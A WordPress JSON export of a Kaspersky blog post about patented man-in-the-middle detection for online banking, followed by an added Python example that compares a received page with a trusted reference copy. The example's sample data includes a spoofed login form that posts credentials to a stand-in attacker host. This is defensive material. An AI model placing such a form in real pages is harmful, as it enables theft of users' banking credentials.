{"id":5755,"date":"2016-07-14T21:35:39","date_gmt":"2016-07-14T21:35:39","guid":{"rendered":"https:\/\/kasperskydaily.com\/b2b\/?p=5755"},"modified":"2020-02-26T11:10:06","modified_gmt":"2020-02-26T16:10:06","slug":"anti-mitm-patent","status":"publish","type":"post","link":"https:\/\/www.kaspersky.com\/blog\/anti-mitm-patent\/5755\/","title":{"rendered":"Isn&#8217;t anyone in the middle?"},"content":{"rendered":"<p>We are pleased to introduce a major reinforcement in our arsenal of security technologies: Kaspersky Lab has patented technology enabling our software to detect man-in-the-middle (MitM) attacks, a technique beloved of authors of financial malware. We hope the technology will greatly reduce the profitability of such scams.<\/p>\n<p>We began development several years ago, after mobile banking had gained real popularity. As people increasingly used online payment applications, cybercriminals followed, becoming more adept at stealing money electronically. One of the most common techniques, still regularly used in banking malware, is compromising the communication channel: the MitM attack.<\/p>\n<p>During a MitM attack, the attacker intercepts the information-exchange channel between the bank and the client and substitutes the data the client receives. That is, the mobile application is not communicating with the bank as the user assumes; it is sending its data to an outside system, while the cybercriminals handle the communication with the bank themselves (with obvious results). 
The specific scenarios enabling such attacks are numerous, as are the techniques fraudsters use. Examples include DNS spoofing (poisoning a DNS resolver\u2019s cache), substituting TLS certificates, rogue or compromised public wireless networks, and intercepting traffic on the device itself by means of malware with elevated system privileges, but there are more.<\/p>\n<p>We decided to create technology that would let banks identify a MitM attack regardless of which techniques the attackers used. In other words, our task was to come up with a method that would enable the client\u2019s device to make sure that it is indeed the bank\u2019s information system on the other side of the connection. Kaspersky Lab\u2019s method rechecks the data sent to the financial application to ensure it really came from the bank.<\/p>\n<p>Let\u2019s see how it works in a typical attack, say through an open Wi-Fi network in a caf\u00e9. A user tries to access a bank account using the bank\u2019s official application, but the caf\u00e9 network is under the control of cybercriminals. When the user opens the banking application, the compromised network prevents the app from establishing an HTTPS connection, forcing the user to fall back to a browser instead. The browser tries to establish an unprotected HTTP connection with the bank\u2019s site, but somewhere in the caf\u00e9\u2019s router the HTTP request is redirected to a malicious server hosting a fake copy of the requested site. When the user enters a username and password, the crooks capture the credentials.<\/p>\n
<p>A key aspect of this attack is that the malicious server, in trying to imitate the banking site\u2019s behavior, has to send its own response to the request. However carefully it copies a legitimate response, the fake response simply cannot be identical. That is where our technology intervenes: it forwards the received response for rechecking and compares it with the data the user should have received from the real bank.<\/p>\n<p>This technology has the potential to do more than reveal the fact of a MitM attack; it can also detect the point at which the attackers interposed their instructions in the communication channel. In a perfect world that might help you find the criminals.<\/p>\n<p>The anti-MitM technology is already in Kaspersky Lab\u2019s products, including <a href=\"https:\/\/www.kaspersky.com\/advert\/enterprise-security\/fraud-prevention?redef=1&amp;THRU&amp;reseller=gl_kbusinesspost_pro_ona_smm__onl_b2b_kbusiness_lnk_______\" target=\"_blank\" rel=\"noopener nofollow\">Kaspersky Fraud Prevention<\/a>, which, among other things, protects online banking processes on Android and iOS systems.<\/p>\n<p>Want to read the patent? You\u2019ll find it on the <a href=\"http:\/\/pdfpiw.uspto.gov\/.piw?docid=09386031\" target=\"_blank\" rel=\"noopener nofollow\">USPTO website<\/a>. 
Do not let the name \u201cSystem and Method for Detection of Targeted Attacks\u201d fool you: The term <em>targeted attacks<\/em> typically applies to attacks aimed at a particular organization, but a MitM attack is tailored to a specific task, so we call it a \u201ctargeted attack\u201d too.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kaspersky Lab has patented technology enabling our software to detect man-in-the-middle (MitM) attacks, beloved of authors of financial malware. <\/p>\n","protected":false},"author":424,"featured_media":15350,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1999,3052],"tags":[111,1519,2444,192],"class_list":{"0":"post-5755","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-business","8":"category-smb","9":"tag-attacks","10":"tag-mitm","11":"tag-patent","12":"tag-protection"},"hreflang":[{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/anti-mitm-patent\/5755\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/anti-mitm-patent\/3905\/"},{"hreflang":"ja","url":"https:\/\/blog.kaspersky.co.jp\/anti-mitm-patent\/12160\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/anti-mitm-patent\/5755\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/anti-mitm-patent\/5755\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.com\/blog\/tag\/attacks\/","name":"attacks"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/5755","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/users\/424"}],"replies":[{"embeddable":true,"href":"https:\/\/
www.kaspersky.com\/blog\/wp-json\/wp\/v2\/comments?post=5755"}],"version-history":[{"count":3,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/5755\/revisions"}],"predecessor-version":[{"id":33716,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/5755\/revisions\/33716"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media\/15350"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media?parent=5755"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/categories?post=5755"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/tags?post=5755"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
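The café scenario and the response-comparison idea in the post above, as an added Python example that is not Kaspersky Lab's code and does not reproduce the patented method: it models the response the client actually received next to a reference copy of the same page that is assumed to have come from the real bank over a trusted channel, flags the HTTPS-to-HTTP downgrade, and compares the two copies to find the byte offset at which the attacker's content was inserted. It goes slightly beyond the text by also checking the final hostname and a few stable headers. The `Response` class, the two sample pages, the hostnames `bank.example` and `login-bank.example.attacker.test`, and the list of stable headers are all assumptions constructed for this example.

```python
# Added example (not Kaspersky's implementation): compare the response a
# client actually received with a reference copy that is assumed to come
# from the real bank over a trusted channel, and report where they diverge.
import hashlib
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import urlsplit


@dataclass
class Response:
    """One HTTP(S) response as seen by a client (constructed, not captured)."""
    url: str                  # final URL the client ended up on
    status: int
    headers: Dict[str, str]   # header names lower-cased
    body: bytes


# Headers whose values should match between the two copies. Volatile headers
# (date, set-cookie, etag, ...) are deliberately left out to avoid false alarms.
STABLE_HEADERS = ("content-type", "strict-transport-security")


def canonical_body(body: bytes) -> bytes:
    """Collapse runs of whitespace so pure formatting differences don't count."""
    return b" ".join(body.split())


def first_divergence(a: bytes, b: bytes) -> Optional[int]:
    """Offset of the first differing byte, or None if a == b."""
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            return i
    return None if len(a) == len(b) else min(len(a), len(b))


def verify_response(received: Response, reference: Response, expected_host: str) -> dict:
    """Return {'tampered': bool, 'findings': [...]} for the received response."""
    findings: List[str] = []
    parts = urlsplit(received.url)

    # The attack in the text starts by blocking HTTPS; a plain-http final URL
    # for a banking site is itself a strong signal.
    if parts.scheme != "https":
        findings.append(f"downgrade: site reached over {parts.scheme}")
    if parts.hostname != expected_host:
        findings.append(f"host mismatch: {parts.hostname!r} instead of {expected_host!r}")
    if received.status != reference.status:
        findings.append(f"status mismatch: {received.status} vs {reference.status}")
    for name in STABLE_HEADERS:
        if received.headers.get(name) != reference.headers.get(name):
            findings.append(f"header {name} differs: "
                            f"{received.headers.get(name)!r} vs {reference.headers.get(name)!r}")

    # Hash first (cheap to ship to a back end), then locate the insertion point.
    got, want = canonical_body(received.body), canonical_body(reference.body)
    if hashlib.sha256(got).digest() != hashlib.sha256(want).digest():
        off = first_divergence(got, want)
        findings.append(f"body differs at offset {off}: {got[off:off + 48]!r}")

    return {"tampered": bool(findings), "findings": findings}


# --- constructed sample data (assumed hosts and pages, not real captures) ------
REFERENCE = Response(
    url="https://bank.example/login",
    status=200,
    headers={"content-type": "text/html; charset=utf-8",
             "strict-transport-security": "max-age=31536000",
             "date": "Thu, 14 Jul 2016 21:35:39 GMT"},
    body=b'<html><body><form action="/login" method="post">'
         b'<input name="user"><input name="pass" type="password"></form></body></html>',
)

# What the client saw in the cafe: HTTPS blocked, HTTP request redirected to a
# look-alike page whose login form posts the credentials to the attacker's host.
INTERCEPTED = Response(
    url="http://bank.example/login",
    status=200,
    headers={"content-type": "text/html; charset=utf-8",
             "date": "Thu, 14 Jul 2016 21:36:02 GMT"},
    body=b'<html><body><form action="http://login-bank.example.attacker.test/collect" method="post">'
         b'<input name="user"><input name="pass" type="password"></form></body></html>',
)

if __name__ == "__main__":
    for finding in verify_response(INTERCEPTED, REFERENCE, "bank.example")["findings"]:
        print(finding)
```

Run on the constructed data, the check reports the downgrade, the missing HSTS header and a body divergence at offset 26, which is exactly where the form's `action` attribute starts pointing at the attacker's host. In a real deployment the reference copy would have to be fetched over a channel the attacker cannot also control (the text's point about rechecking the response), and volatile page fragments such as CSRF tokens would need canonicalizing before the hash comparison.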